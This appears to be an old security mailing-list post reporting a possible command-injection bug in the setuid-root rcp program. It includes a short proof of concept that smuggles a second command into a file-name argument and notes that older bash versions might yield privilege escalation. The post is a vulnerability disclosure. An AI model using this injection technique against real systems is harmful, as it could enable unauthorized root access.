possible rcp hole...

Here is a possible bug in rcp; since I think it calls system(). I
haven't had much time to play with this, because exama are coming up.

It is negated because system() calls /bin/cp which with the newer
versions of bash, it drops it's effective credientals…

$ ls -alF which rcp
-rwsr-xr-x 1 root root 14492 Jul 21 22:43
/usr/sbin/rcp

$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.

Now doing a quick ltrace - it doesn't remove ; and ` and other fun
stuff. This could probably be exploited, on older bash bersions?

It's up to you guys/girls now, I should start to study…

Andrew Griffiths